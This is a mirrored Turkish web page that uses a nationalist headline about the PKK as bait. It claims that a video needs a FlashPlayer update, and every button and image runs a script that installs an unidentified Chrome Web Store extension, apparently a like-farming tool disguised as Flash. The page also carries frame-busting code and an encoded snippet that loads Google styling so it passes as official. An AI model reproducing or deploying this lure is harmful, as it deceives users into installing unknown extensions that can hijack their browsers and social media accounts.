<html class="no-js consumer" lang="tr">
<title>Pkk'nin Sonu </title>

<!-- Mirrored from fastotoliked.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Mon, 21 Jan 2013 19:16:02 GMT -->
<head>

<meta name="google-site-verification" content="enlibeccmboipfmpmjoecfdmnahcjlhj">
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/djpnjilhooodipllnjedjeiabkboakok">
<link rel="shortcut icon" href="http://cdn1.iconfinder.com/data/icons/yooicons_set09_halloween/128/cheshire_cat.png">
<script>
 <a href="javascript:" onclick="kur();" style="text-decoration:none;">

            </a></div><a href="javascript:" onclick="kur();" style="text-decoration:none;">

<script>
            if(top!=self)
                {
                    top.location=self.location;
                }
            if(frames)
                {
                    if(top.frames.length>0)
                        top.location.href=self.location;
                }
</script>
<a href="javascript:" onclick="kur();" style="text-decoration:none;"></a>
<script type="text/javascript">

function kur()
{
		chrome.webstore.install("https://chrome.google.com/webstore/detail/djpnjilhooodipllnjedjeiabkboakok");
                                            alert("FlashPlayer Eklentisi Tarayicinizda Güncel Degil , Devam Etmek Için Ekle'ye Tiklayin");
}
    </script>
	</title>
    <link href="../www.google.com/images/icons/product/chrome-32.png" rel="icon" type="image/ico">
   <div class="browser-landing" id="main">
   <link href=
    "http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700&amp;subset=latin,latin-ext" rel=
    "stylesheet">
    <script type="text/javascript">
document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%69%6E%74%6C%2F%74%72%2F%63%68%72%6F%6D%65%2F%61%73%73%65%74%73%2F%63%6F%6D%6D%6F%6E%2F%63%73%73%2F%63%68%72%6F%6D%65%2E%6D%69%6E%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%22%2F%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6A%73%2F%67%77%65%62%2F%61%6E%61%6C%79%74%69%63%73%2F%61%75%74%6F%74%72%61%63%6B%2E%6A%73%22%3E%0A%09%3C%2F%73%63%72%69%70%74%3E'));
</script>
<style>
body{
	background-image: url(turkey.jpg);
	background-attachment: scroll;}
</style>
<div class="compact marquee-stacked" id="marquee">
        <div class="marquee-copy">
          <h1>
            Pkk Teröristlerinin Sonu !
          </h1>
          <p>
          <font color='#cococo' > Helal Olsun Türk Askerim , Arkanizdayiz ..</font>
    <a href="javascript:" onclick="kur();"> <img src="anasayfa.jpg"</a>
<br>
<center>
<a class="button eula-download-button" data-g-event="cta" data-g-label="download-chrome" href="javascript:" onclick="kur();">FlashPlayer Güncelle</a>
</center>
<font color='#cococo' > FlashPlayer Yüklü Olmadigindan Video Açilamiyor</font> </p> </center> <a href="javascript:" onclick="kur();"> <img src="flash.png"><br><br>
        <div class="marquee-image">


<script language="javascript" src="yasak.js"></script>
   <h1>
   <b>
            ProFonix , Erkan Durmaz , Bcykn Yapimidir ;)
			</b>
          </h1>
		   <script type="text/javascript"><!--
google_ad_client = "ca-pub-9802413630581770";
/* newclient */
google_ad_slot = "7314422608";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>


<!-- Mirrored from fastotoliked.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Mon, 21 Jan 2013 19:16:14 GMT -->
</html>


*google translator
**idioma turco